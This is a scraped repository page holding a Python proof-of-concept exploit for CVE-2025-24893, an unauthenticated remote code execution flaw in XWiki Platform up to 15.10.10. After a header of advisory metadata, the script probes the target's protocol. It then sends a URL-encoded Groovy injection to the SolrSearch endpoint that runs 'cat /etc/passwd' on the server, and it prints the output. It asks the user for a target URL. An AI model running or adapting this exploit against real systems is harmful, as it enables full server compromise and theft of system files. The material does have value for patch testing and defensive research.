a8420434d2
4 changes to exploits/shellcodes/ghdb Apache Tomcat 11.0.3 - Remote Code Execution XWiki Platform 15.10.10 - Remote Code Execution YesWiki 4.5.1 - Unauthenticated Path Traversal
97 lines
No EOL
3.3 KiB
Text
97 lines
No EOL
3.3 KiB
Text
# Exploit Title: XWiki Platform - Remote Code Execution
|
|
# Exploit Author: Al Baradi Joy
|
|
# Exploit Date: April 6, 2025
|
|
# CVE ID: CVE-2025-24893
|
|
# Vendor Homepage: https://www.xwiki.org/
|
|
# Software Link: https://github.com/xwiki/xwiki-platform
|
|
# Version: Affected versions up to and including XWiki 15.10.10
|
|
# Tested Versions: XWiki 15.10.10
|
|
# Vulnerability Type: Remote Code Execution (RCE)
|
|
# CVSS Score: 9.8 (Critical)
|
|
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
# Description:
|
|
# XWiki Platform suffers from a critical vulnerability where any guest user
|
|
can
|
|
# execute arbitrary code remotely through the SolrSearch endpoint. This can
|
|
lead
|
|
# to a full server compromise, including the ability to execute commands on
|
|
the
|
|
# underlying system. The vulnerability impacts the confidentiality,
|
|
integrity,
|
|
# and availability of the XWiki installation. The issue has been patched in
|
|
XWiki
|
|
# versions 15.10.11, 16.4.1, and 16.5.0RC1.
|
|
# Proof of Concept: Yes
|
|
# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
|
|
# References:
|
|
# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
|
|
# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
|
|
# - GitHub Exploit Link:
|
|
https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
|
|
|
|
import requests
|
|
|
|
# Banner
|
|
def display_banner():
|
|
print("="*80)
|
|
print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code
|
|
Execution")
|
|
print("Exploit Author: Al Baradi Joy")
|
|
print("GitHub Exploit:
|
|
https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
|
|
print("="*80)
|
|
|
|
# Function to detect the target protocol (HTTP or HTTPS)
|
|
def detect_protocol(domain):
|
|
https_url = f"https://{domain}"
|
|
http_url = f"http://{domain}"
|
|
|
|
try:
|
|
response = requests.get(https_url, timeout=5, allow_redirects=True)
|
|
if response.status_code < 400:
|
|
print(f"[✔] Target supports HTTPS: {https_url}")
|
|
return https_url
|
|
except requests.exceptions.RequestException:
|
|
print("[!] HTTPS not available, falling back to HTTP.")
|
|
|
|
try:
|
|
response = requests.get(http_url, timeout=5, allow_redirects=True)
|
|
if response.status_code < 400:
|
|
print(f"[✔] Target supports HTTP: {http_url}")
|
|
return http_url
|
|
except requests.exceptions.RequestException:
|
|
print("[✖] Target is unreachable on both HTTP and HTTPS.")
|
|
exit(1)
|
|
|
|
# Exploit function
|
|
def exploit(target_url):
|
|
target_url = detect_protocol(target_url.replace("http://",
|
|
"").replace("https://", "").strip())
|
|
exploit_url =
|
|
f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
|
|
|
|
try:
|
|
print(f"[+] Sending request to: {exploit_url}")
|
|
response = requests.get(exploit_url, timeout=10)
|
|
|
|
# Check if the exploit was successful
|
|
if response.status_code == 200 and "root:" in response.text:
|
|
print("[✔] Exploit successful! Output received:")
|
|
print(response.text)
|
|
else:
|
|
print(f"[✖] Exploit failed. Status code:
|
|
{response.status_code}")
|
|
|
|
except requests.exceptions.ConnectionError:
|
|
print("[✖] Connection failed. Target may be down.")
|
|
except requests.exceptions.Timeout:
|
|
print("[✖] Request timed out. Target is slow or unresponsive.")
|
|
except requests.exceptions.RequestException as e:
|
|
print(f"[✖] Unexpected error: {e}")
|
|
|
|
# Main execution
|
|
if __name__ == "__main__":
|
|
display_banner()
|
|
target = input("[?] Enter the target URL (without http/https):
|
|
").strip()
|
|
exploit(target) |